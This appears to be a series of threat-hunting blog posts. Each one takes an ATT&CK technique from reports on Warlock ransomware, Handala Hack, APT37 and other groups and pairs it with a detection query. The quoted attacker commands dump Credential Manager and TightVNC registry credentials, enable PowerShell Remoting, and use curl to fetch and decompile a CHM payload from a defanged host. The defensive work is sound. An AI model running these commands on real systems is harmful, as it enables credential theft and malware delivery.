Know Your Adversary

Hello everyone! Today we’ll go over several techniques from the Warlock ransomware attack report that caught my attention. So, the first technique is Windows Credential Manager (T1555.004) . The attackers used the following command to access saved passwords: C:\Windows\System32\rundll32.exe keymgr.dll,KRShowKeyMgr This kind of behavioral indicator isn’t very common, so it works well for threat hunting: event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: ("keymgr.dll" AND "KRShowKeyMgr") The next technique is PowerShell (T1059.001) . This time, the attackers abused it to enable PowerShell Remoting: C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck" Although this behavior can be legitimate, it’s still a good target for threat hunting: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "Enable-PSRemo...

Hello everyone! Today we'll look at another interesting example of the following technique:  Remote Access Tools (T1219) . Scrolling the report on Handala Hack modus operandi, I've spotted an interesting tool abused by the threat actors. I'm talking about NetBird .  The attackers leveraged it to reach hosts that were not directly accessible from outside the network. The tool has no detections on VirusTotal, and may be a good target for hunting, for example: event_type: "processcreatewin" AND proc_file_productname: "netbird" See you soon!

Hello everyone! Today we’ll once again talk about the Windows Registry and look at an example of the Unsecured Credentials: Credentials in Registry (T1552.002) technique. While reading an investigation report on the CL-UNK-1068  attacks in South, Southeast, and East Asia, I once again noticed that attackers actively abused reg.exe . In particular, they frequently used the export parameter, for example: reg export "HKEY_USERS\[%SID%]\SOFTWARE\TightVNC\Server" reg export HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TightVNC\Server reg export HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server In this case, the attacker exports the TightVNC configuration from the registry in order to obtain credentials. For detection, we can either use specific registry keys that contain sensitive data or proactively search for suspicious export events: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "export" See you soon!

Hello everyone! Sometimes, even if a victim runs a malicious file, the system may still avoid compromise. One reason for this is the use of the System Location Discovery: System Language Discovery (T1614.001) technique. The point is that in some cases attackers do not want their malware to run on systems located in certain countries. Today we’ll look at an example of how attackers restrict the download of a stealer for systems that may be located in CIS countries. So, the loader for the SHub stealer targeting macOS used the following command to obtain information about the language of the compromised system: defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian The AppleEnabledInputSources key in the com.apple.HIToolbox.plist file contains information about keyboard layouts. Its contents are checked for the presence of the Russian language, which is typical for CIS systems. A good detection opportunity is suspicious...

Hello everyone! Today we’ll take a look at a technique that isn’t very common. Nevertheless, it occasionally appears in attackers’ toolkits. This is System Binary Proxy Execution: Compiled HTML File (T1218.001) . This technique is often used in the early stages of the cyberattack lifecycle. For example, attackers may distribute malicious CHM files inside archives as attachments in phishing emails. Let’s look at an example. In this case , the attackers used an archive containing a shortcut with the following command: "C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k In this scenario, the CHM file is downloaded from a remote web resource and extracted using Windows HTML Help ( hh.exe ), while using the -decompile argument. In the context of threat hunting, we can look for events in...

Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting. So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform. From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate the legitimate events: event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com" See you soon!